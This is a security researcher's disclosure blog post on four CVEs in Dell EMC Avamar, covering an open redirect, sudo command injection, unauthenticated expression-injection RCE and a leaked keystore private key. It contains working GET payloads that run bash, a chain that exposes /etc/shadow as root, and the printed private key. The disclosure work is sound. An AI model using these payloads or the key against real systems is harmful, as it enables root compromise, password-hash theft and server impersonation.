Multiple Security Vulnerabilities in Dell EMC Avamar
In this post I’ll cover four different CVEs identified by myself and a colleague from TSS, who wishes to remain unnamed. These vulnerabilities were discovered within the Dell EMC Avamar backup software, which is also used by VMWare’s vSphere Data Protection (VDP).
- Open Redirection Vulnerability (CVE-2018–11067)
- Command Injection Vulnerability (CVE-2018–11077)
- Remote Code Execution Vulnerability (CVE-2018–11066)
- Information Exposure Vulnerability (CVE-2018–11076)
I’ll also demonstrate how some of these vulnerabilities could be chained together, resulting in unauthenticated remote code execution with root privileges.
Open Redirection Vulnerability (CVE-2018–11067)
It was possible to use the /aam/gridSummary.action?redirect page from the Avamar web interface to perform an unauthenticated open redirect. This was done by simply specifying the location to redirect to:
GET /aam/gridSummary.action?redirect:http://exmple.comThe server would then respond with the following HTTP header, resulting in the redirection:
Location: http://example.comCommand Injection Vulnerability (CVE-2018–11077)
Our test instance of Avamar was being run as a low privileged user account, admin. Running ‘sudo –l’ as this user revealed a large number of custom Avamar specific scripts which could be run with root privileges, one of which was the getlogs script.
TSS discovered that commands could be injected into an invocation of this script by passing them after the --verbose flag:
admin@vcp:~/#: sudo /usr/local/avamar/bin/getlogs --verbose\`touch /tmp/testing\`admin@vcp:~/#: ls -la /tmp/testing
-rw------- 1 root root 0 Dec 20 09:22 /tmp/testing
By injecting the touch command through the getlogs script, the /tmp/testing file has been created with root privileges, as per the ownership of the file. A low privileged account, admin in this case, may exploit this vulnerability to execute commands locally with root privileges.
Remote Code Execution Vulnerability (CVE-2018–11066)
As it turned out, there was more to the open redirection vulnerability (CVE-2018–11067) outlined above. By sending the following request, there appeared to be some sort of evaluation happening on the server side.
GET /aam/gridSummary.action?redirect:http://example.com$%7b9999%2b1%7dDecoded, the HTTP GET request looks like this:
GET /aam/gridSummary.action?redirect:http://example.com${9999+1}The server would then attempt to redirect us to http://example.com10000, confirming that the 9999+1 expression was run and looking suspiciously like Struts RCE.
Upon examining this further, it was possible to run arbitrary commands on the server within the context of the low privileged admin account, the account which was running the Avamar service.
While entering commands, no output was returned from the web server, so it took some playing with to get things working correctly.
The following request copies the /etc/passwd file into the Avamar public web directory:
GET /aam/gridSummary.action?redirect:${(new+java.lang.ProcessBuilder(new+java.lang.String[]{'bash','-c','cat+/etc/passwd+>/usr/local/avamar-tomcat-7.0.59/webapps/aam/passwd'})).start()}Once sent, it was then possible to view the /etc/passwd file at http://example.com/aam/passwd, confirming that the command ran as expected.
Like the open redirection vulnerability, this request did not require authentication.
By your powers combined!
The passwd file that was copied was owned by the low privileged admin user, as that’s the user account the web server was running as. It was possible to escalate privileges to root by using the command injection vulnerability (CVE-2018–11077) outlined above.
Our new HTTP GET request using the getlogs script now looks something like this:
GET /aam/gridSummary.action?redirect:${(new+java.lang.ProcessBuilder(new+java.lang.String[]{'bash','-c','sudo+/usr/local/avamar/bin/getlogs+--verbose\\`"cp+/etc/shadow+/usr/local/avamar-tomcat-7.0.59/webapps/aam/shadow;chmod+777+/usr/local/avamar-tomcat-7.0.59/webapps/aam/shadow"\\`'})).start()}This makes a copy of the /etc/shadow file, a file only accessible to the root user containing the hashed passwords of the system, and places it into the Avamar public web directory. This file was then successfully accessible through http://example.com/aam/shadow.
Just to confirm, on the server side we can see that the shadow file has been copied, is still owned by the root user, and has successfully had its permissions modified to be accessed by any user or group as intended.
root@vcp:#: ls -la /usr/local/avamar-tomcat-7.0.59/webapps/aam/shadow
-rwxrwxrwx 1 root root 898 Dec 19 16:26 shadow /usr/local/avamar-tomcat-7.0.59/webapps/aam/shadowWith this level of access it was possible to simply reset the root password and login as the root user via SSH.
Information Exposure Vulnerability (CVE-2018–11076)
As part of the Avamar Java administration client, a file called rmi_ssl_keystore.jar is downloaded when an unauthenticated user attempts to access the admin interface. This is used to authenticate to the remote server.
The file rmi_ssl_keystore.jar contains a Java keystore with default password:
user@arch ~/Desktop/ssl % keytool -list -keystore rmi_ssl_keystore
Enter keystore password:
Keystore type: JKS
Keystore provider: SUNYour keystore contains 1 entrymcssl, Feb 1, 2008, PrivateKeyEntry,
Certificate fingerprint (SHA-256): B4:E6:71:77:58:9B:58:64:E2:F7:3A:A0:2A:07:F8:7B:2E:CA:1B:22:2B:C3:98:A8:90:F8:D8:7A:8E:0A:EE:F9
This keystore contains the private key for the server that the Avamar Java Administration client connects to. By exporting the certificate, it was possible to validate that this was in fact the same key as the server provides.
keytool -importkeystore -srckeystore rmi_ssl_keystore -destkeystore store.p12 -deststoretype PKCS12
Importing keystore rmi_ssl_keystore to store.p12...
Enter destination keystore password:
Re-enter new password:
Enter source keystore password:
Entry for alias mcssl successfully imported.
Import command completed: 1 entries successfully imported, 0 entries failed or cancelledWe can see that this file contains a private key:
user@arch ~/Desktop/ssl % openssl pkcs12 -in store.p12
Enter Import Password:
Bag Attributes
friendlyName: mcssl
localKeyID: 54 69 6D 65 20 31 35 31 33 30 34 39 33 32 34 32 37 30
Key Attributes: <No Attributes>
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIBrDBOBgkqhkiG9w0BBQ0wQTApBgkqhkiG9w0BBQwwHAQIYqnv7LKEhPgCAggA
MAwGCCqGSIb3DQIJBQAwFAYIKoZIhvcNAwcECM10zEMCIBEtBIIBWCH7QrPQoOJT
8zmJa3vqsD8eLdOIn6ZCtfiZxuEGU6QhbFFJma274rPNos+YU6Dv9ytffsY9FKwg
bZJCBxT8HnJHcdX+mh7QSiPufC96J9NnPX8rwBn2j4VbYuTWkp6/VB2Zb4J6sSmc
+FUpN+Fe68kgFpWazC2PMPlgZ5T7YiS0cx9tvJkAUb4ZTMWaWrms7t0HmWPtn4+y
4Nf4R+ByQN7+CqrEVCxxPwk0XQE8fgGRdqpFDWSfxw51jVkdmztW00Jkg4XwcXB7
34+2W9LLyfJ/CwpD0LjxZnthH102YrW7rL0YEBqhEPdaHVrPJ64wTeJLfGrmjR1m
5lg8FTniXEfMAcmw0Fd9d9sOXmPsyLmbsh9AliihnqxPbjnvCxu45irz7UtUJ13C
PIAnG/ni2k19/ctXtpm/boX28svCK/hSRK8Y1W8TbM8I2rVwD1X32T/2Gdv25g9y
-----END ENCRYPTED PRIVATE KEY-----
Bag Attributes
friendlyName: mcssl
localKeyID: 54 69 6D 65 20 31 35 31 33 30 34 39 33 32 34 32 37 30
subject=/C=US/ST=California/L=Irvine/O=EMC/OU=Avamar/CN=Administrator
issuer=/C=US/ST=California/L=Irvine/O=EMC/OU=Avamar/CN=Administrator
-----BEGIN CERTIFICATE-----
MIIDCTCCAscCBEeiV2AwCwYHKoZIzjgEAwUAMGoxCzAJBgNVBAYTAlVTMRMwEQYD
VQQIEwpDYWxpZm9ybmlhMQ8wDQYDVQQHEwZJcnZpbmUxDDAKBgNVBAoTA0VNQzEP
MA0GA1UECxMGQXZhbWFyMRYwFAYDVQQDEw1BZG1pbmlzdHJhdG9yMB4XDTA4MDEz
MTIzMTg1NloXDTE4MDEyODIzMTg1NlowajELMAkGA1UEBhMCVVMxEzARBgNVBAgT
CkNhbGlmb3JuaWExDzANBgNVBAcTBklydmluZTEMMAoGA1UEChMDRU1DMQ8wDQYD
VQQLEwZBdmFtYXIxFjAUBgNVBAMTDUFkbWluaXN0cmF0b3IwggG4MIIBLAYHKoZI
zjgEATCCAR8CgYEA/X9TgR11EilS30qcLuzk5/YRt1I870QAwx4/gLZRJmlFXUAi
UftZPY1Y+r/F9bow9subVWzXgTuAHTRv8mZgt2uZUKWkn5/oBHsQIsJPu6nX/rfG
G/g7V+fGqKYVDwT7g/bTxR7DAjVUE1oWkTL2dfOuK2HXKu/yIgMZndFIAccCFQCX
YFCPFSMLzLKSuYKi64QL8Fgc9QKBgQD34aCF1ps93su8q1w2uFe5eZSvu/o66oL5
V0wLPQeCZ1FZV4661FlP5nEHEIGAtEkWcSPoTCgWE7fPCTKMyKbhPBZ6i1R8jSjg
o64eK7OmdZFuo38L+iE1YvH7YnoBJDvMpPG+qFGQiaiD3+Fa5Z8GkotmXoB7VSVk
AUw7/s9JKgOBhQACgYEAvoCDTrFxncEXPuKWO0Um/KSsuPEoN4OSgq36H1Kjs4Mt
/tYvTcc0RPFxiKaDYoc0LqlbJr8pab5vosZURHE49nTktJDAcB6ENpRfD05Jq08M
ILIBB+LaC6zDY0L8AhRPLWHFu0ZT3xuAuEkIZ3EtbposbFCwh6vHneX/Z4Va7fow
CwYHKoZIzjgEAwUAAy8AMCwCFBjMfwSfvpWG4fI3EE5Lbp74OiFUAhQjnOmEL+Va
i5wXrLxQwoN75duEEw==
-----END CERTIFICATE-----
user@arch ~/Desktop/ssl % openssl pkcs12 -in store.p12 -nodes -nocerts -out unencrypted.key
Enter Import Password:
user@arch ~/Desktop/ssl % cat unencrypted.key
Bag Attributes
friendlyName: mcssl
localKeyID: 54 69 6D 65 20 31 35 31 33 30 34 39 33 32 34 32 37 30
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIBTAIBADCCASwGByqGSM44BAEwggEfAoGBAP1/U4EddRIpUt9KnC7s5Of2EbdS
PO9EAMMeP4C2USZpRV1AIlH7WT23WPq/xfW6MPbLm1Vs14E7gB00b/JmYLdrmVCl
pJ+f6AR7ECLCT7up1/63xhv4O1fnxqimFQ8E+4P208UewwI1VBNaFpEy9nXzrith
1yrv8iIDGZ3RSXHHAhUBl2BQjxUjC8yykrmCouuEC/BYHPUCgYEA9+GghdabSd7L
vKtcNrhXuXmUr7v6OuqC+VdMCz0HgmdRWVeOutRLT+ZxBxCBgLRJFnEj6EwoFhO3
zwkyjMim4TwWeotUfI0o4KOuHiuzpnWRbqN/C/ohNWLx+2J6ASQ7zKTxgqhRkImo
g9/hWuWfBpDLZl6Ae1UlZAFMO/7PSSoEFwIVAJZv8SJj4Tjny2clL69UTKKNx+bP
-----END PRIVATE KEY-----If an attacker is able to intercept communication between a user of the Java administration client and the server then it is possible for the attacker to impersonate the server.
These bugs were reported to the Dell Product Security Incident Response Team (PSIRT), who have been great to deal with throughout the process.
Dell have posted the vulnerabilities to Full Disclosure, advising affected software versions and available hotfixes:
Jarrod is a penetration tester at TSS specialising in web application testing.
TSS is a specialist cyber security company providing penetration testing, security assurance consulting and managed security services. More information is available at our website https://www.tsscyber.com.au.
